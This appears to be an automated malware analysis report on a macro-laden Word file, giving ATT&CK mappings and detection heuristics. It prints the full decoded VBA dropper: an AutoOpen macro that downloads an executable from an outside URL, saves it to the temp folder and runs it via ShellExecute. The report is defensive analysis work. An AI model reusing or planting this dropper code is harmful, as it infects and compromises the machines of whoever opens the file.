Verdict: MALICIOUS (Risk Score: 338)

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File

Malware Insights
The sample contains VBA macros that are configured to execute automatically via the AutoOpen subroutine. The script downloads a file from "http://directexe.com/32Mx/smokies.exe" and saves it to the temporary directory, then executes it. The document body provides detailed instructions for using anonymization techniques and cryptocurrency exchanges, suggesting a phishing or scam lure to facilitate the execution of the downloaded payload.
Heuristics (11)

- ClamAV: Doc.Dropper.Agent-6531279-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Dropper.Agent-6531279-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]. Document contains VBA macro code.
- VBA downloads and writes a file to disk [critical, OLE_VBA_HTTP_DROP_EXEC]. VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: e69606c30fff4c93a3b9c8c3932e50fe.Write a3ea6aee45ad475aac8824884c6b30e9.responseBody
- CreateObject call [high, OLE_VBA_CREATEOBJ].
  Matched line in script: Set a3ea6aee45ad475aac8824884c6b30e9 = CreateObject("MSXML2.XMLHTTP")
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN].
  Matched line in script: Sub AutoOpen()
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON].
  Matched line in script: d860c6671c5c41d49d08851764f59ae0 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52))
- Reference to ShellExecute API [high, SC_STR_SHELLEXEC].
- LOLBin token sequence in document text [high, SE_LOLBIN_RUN_COMMAND]. Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs extracted (each referenced by macro):
  - http://www.technitium.com/tmac/index.html
  - https://www.okpay.com/
  - https://btc-e.com/
  - http://www.pcgamesupply.com/buy/CashU-100/
  - http://www.pcgamesupply.com/buy/CashU-100/#
  - http://directexe.com/32Mx/smokies.exe
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4104 bytes | 440b69180ec72466be63d8a22209ef322093ae42cd85d41d54095100a0337290 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim f2cc230470d44a01bb95c7a9b6e55a93 As New f50872114f9340d2b22b3df03390a8
Dim cdd3d1be974c4e10855c2a4a2083e1e1 As New c8459494b9d84194be78f47bd15d74f
bcb9c46500c54ec4bd4c503fe5fa4b52 = "http://directexe.com/32Mx/smokies.exe"
d860c6671c5c41d49d08851764f59ae0 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52))
f2cc230470d44a01bb95c7a9b6e55a93.eadc189693094d3c819dcac7231c8fb4 bcb9c46500c54ec4bd4c503fe5fa4b52, d860c6671c5c41d49d08851764f59ae0
cdd3d1be974c4e10855c2a4a2083e1e1.fbef33218d1d44168400f09831386b86 d860c6671c5c41d49d08851764f59ae0
End Sub
Attribute VB_Name = "f50872114f9340d2b22b3df03390a8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub eadc189693094d3c819dcac7231c8fb4(cccfc78610b0487cb9efcae8afd9d62ce6248981c6e148cca990c844a8dd86cf, f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91)
Set a3ea6aee45ad475aac8824884c6b30e9 = CreateObject("MSXML2.XMLHTTP")
Set e69606c30fff4c93a3b9c8c3932e50fe = CreateObject("ADODB.Stream")
a3ea6aee45ad475aac8824884c6b30e9.Open "GET", cccfc78610b0487cb9efcae8afd9d62ce6248981c6e148cca990c844a8dd86cf, False
a3ea6aee45ad475aac8824884c6b30e9.send
e69606c30fff4c93a3b9c8c3932e50fe.Type = 1
e69606c30fff4c93a3b9c8c3932e50fe.Open
e69606c30fff4c93a3b9c8c3932e50fe.Write a3ea6aee45ad475aac8824884c6b30e9.responseBody
e69606c30fff4c93a3b9c8c3932e50fe.SaveToFile f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91, 2
e69606c30fff4c93a3b9c8c3932e50fe.Close
End Sub
Attribute VB_Name = "c8459494b9d84194be78f47bd15d74f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 Then
Private Declare PtrSafe Function e6f0a79910fa4fd2bc34050b7127c003e6f0a79910fa4fd2bc34050b7127c003 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal cc3baee598a84867a9cd47edfc3956d4a7db5842e53b45a19bce4bfda41773f4 As Integer, ByVal caaf7a6afd504b0ea1c8d9836a749259c32b822128b147abb1d0348d2b872779 As String, ByVal dbe6ac9f5118489ea21ebe2017c13165c66a1421ad6948b68b708614515d1076 As String, ByVal f8672d5d45ba4b8995e428d0c59e1cf6d5c3649fd47b4a24a2ef220f3b6b6a6e As String, ByVal a7c01a631bda4a95bf16326f5dc1b914b934bca31d774359bb83605d23208e5d As String, ByVal c7663b3ca08f46259459ca6aa7278381aa4723789f80485499993c86f0163e95 As Integer) As Integer
#Else
Private Declare Function e6f0a79910fa4fd2bc34050b7127c003e6f0a79910fa4fd2bc34050b7127c003 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal cc3baee598a84867a9cd47edfc3956d4a7db5842e53b45a19bce4bfda41773f4 As Integer, ByVal caaf7a6afd504b0ea1c8d9836a749259c32b822128b147abb1d0348d2b872779 As String, ByVal dbe6ac9f5118489ea21ebe2017c13165c66a1421ad6948b68b708614515d1076 As String, ByVal f8672d5d45ba4b8995e428d0c59e1cf6d5c3649fd47b4a24a2ef220f3b6b6a6e As String, ByVal a7c01a631bda4a95bf16326f5dc1b914b934bca31d774359bb83605d23208e5d As String, ByVal c7663b3ca08f46259459ca6aa7278381aa4723789f80485499993c86f0163e95 As Integer) As Integer
#End If
Sub fbef33218d1d44168400f09831386b86(ea1ae239ff6540968337535ac3c3ae95b9719b8d67ff404da4026d7ec8c293f9)
e6f0a79910fa4fd2bc34050b7127c003e6f0a79910fa4fd2bc34050b7127c003 0, "open", ea1ae239ff6540968337535ac3c3ae95b9719b8d67ff404da4026d7ec8c293f9, "", "", 1
End Sub